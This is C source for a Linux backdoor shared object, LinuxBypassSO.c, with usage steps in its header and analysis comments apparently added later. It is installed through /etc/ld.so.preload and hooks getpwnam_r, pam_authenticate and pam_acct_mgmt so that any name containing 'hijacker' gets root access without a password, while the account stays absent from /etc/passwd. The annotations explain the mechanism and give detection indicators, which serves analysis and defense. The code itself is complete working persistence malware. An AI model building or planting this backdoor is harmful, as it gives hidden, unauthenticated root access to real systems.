- /*
- Filename: LinuxBypassSO.c
- Author: Goodies (gumshoe on IRCs)
- Description: This is a backdoor with the purpose of hijacking the Linux authentication functions
- and the functions that parse /etc/passwd to allow a non-existent account root access
- without a password or authentication. This is a backdoor and must be run as root at
- some point. If you lose root access but have access to a local account, you will be
- able to sign in and achieve root access easily. This will also be used in the future
- to allow SSH logins (which requires more functions to be hooked).
- Usage Examples:
- From Root:
- gcc -shared -fPIC -o ./bypass.so LinuxBypassSO.c -ldl
- echo "`pwd`/bypass.so" > /etc/ld.so.preload
- From Any Account:
- su - hijacker
- # root @ Linux achieved #
- */
- #define _GNU_SOURCE
- #include <stdio.h>
- #include <stdlib.h>
- #include <pwd.h>
- #include <dlfcn.h>
- #include <security/pam_appl.h>
- #include <security/pam_modules.h>
- #include <string.h>
- #define HIJACK_LOGIN "hijacker" /* Name the hooks below match against; copied into `hijacker` by init(). A string indicator when triaging an unknown shared object. */
- #define AUTHOR "Goodies" //@GoodiesHQ on Twitter; not referenced anywhere else in this listing
- static int (*old_pam_authenticate)(pam_handle_t*, int); /* Pointer to the real pam_authenticate, filled in by init() */
- static int (*old_getpwnam_r)(const char*, struct passwd*, char*, size_t, struct passwd**); /* Pointer to the real getpwnam_r, filled in by init() */
- static int (*old_pam_acct_mgmt)(pam_handle_t*, int); /* Pointer to the real pam_acct_mgmt, filled in by init() */
- static char *hijacker = NULL, *r00t = NULL; /* Both start NULL; init() sets them to HIJACK_LOGIN and "root" */
- __attribute__((constructor)) void init(){ /* Analysis note: being a constructor, this runs when the object is loaded,
-    which with the /etc/ld.so.preload entry shown in the header means in each dynamically
-    linked process that starts afterwards. It fills in the two name strings and looks up the
-    next definitions of the three hooked symbols so the wrappers in this file can forward to
-    them. For detection: an object outside libc/libpam that exports getpwnam_r,
-    pam_authenticate and pam_acct_mgmt together, or any unexpected line in
-    /etc/ld.so.preload, is a strong indicator of this technique. */
- if(!hijacker || strcmp(hijacker, "") || hijacker == NULL) /* hijacker starts NULL, so the first test is true on load */
- hijacker = strdup(HIJACK_LOGIN);
- if(!r00t || strcmp(r00t, "") || r00t == NULL) /* same pattern for the substitute account name */
- r00t = strdup("root");
- if(!old_pam_authenticate)
- old_pam_authenticate = dlsym(RTLD_NEXT, "pam_authenticate"); /* RTLD_NEXT: the next definition after this object in search order */
- if(!old_getpwnam_r)
- old_getpwnam_r = dlsym(RTLD_NEXT, "getpwnam_r");
- if(!old_pam_acct_mgmt)
- old_pam_acct_mgmt = dlsym(RTLD_NEXT, "pam_acct_mgmt");
- }
- int getpwnam_r(const char *name, struct passwd *pwd, char *buf, size_t buflen, struct passwd **result){ /* Analysis note: this definition
-    shadows getpwnam_r in any process that has the object loaded. A lookup whose name
-    contains the hijack string is answered with whatever the real function returns for
-    "root"; every other lookup is forwarded unchanged. The matched name therefore needs no
-    line in /etc/passwd, so auditing that file alone will not reveal it; inspect
-    /etc/ld.so.preload and the objects it lists instead. */
- if(strstr(name, hijacker)){ // substring test: any name containing the hijack string matches
- pwd -> pw_gid = 0;
- return old_getpwnam_r(r00t, pwd, buf, buflen, result); // r00t is "root" once init() has run
- }else
- return old_getpwnam_r(name, pwd, buf, buflen, result); // pass-through for all other names
- }
- int pam_authenticate(pam_handle_t *pamh, int flags){ /* Analysis note: this definition shadows pam_authenticate. When the
-    PAM_USER item contains the hijack string it reports PAM_SUCCESS without calling the
-    real function, so no credential is checked for that name. All other users are handed
-    to the real implementation and get its result. */
- void *pam_user = NULL; // populated in pam_get_item
- pam_get_item(pamh, PAM_USER,(const void**)&pam_user); // return value is not inspected
- // Gets the username parameter passed
- if(strstr(pam_user, hijacker)) // substring test, same as in getpwnam_r
- return PAM_SUCCESS; // If the user passed is HIJACK_LOGIN, return success message
- return old_pam_authenticate(pamh, flags);
- // otherwise, return the legitimate success/error
- }
- int pam_acct_mgmt(pam_handle_t *pamh, int flags){ /* Analysis note: this definition shadows pam_acct_mgmt, the PAM
-    account-management call. For a PAM_USER containing the hijack string it reports
-    PAM_SUCCESS without consulting the real function; all other users are forwarded to
-    the real implementation. */
- void *pam_user = NULL; // populated in pam_get_item
- pam_get_item(pamh, PAM_USER,(const void**)&pam_user); // return value is not inspected
- // Gets the username parameter passed
- if(strstr(pam_user, hijacker)) // substring test, same as in getpwnam_r
- return PAM_SUCCESS; // If the user passed is HIJACK_LOGIN, return success message
- return old_pam_acct_mgmt(pamh, flags);
- // otherwise, return the legitimate success/error
- }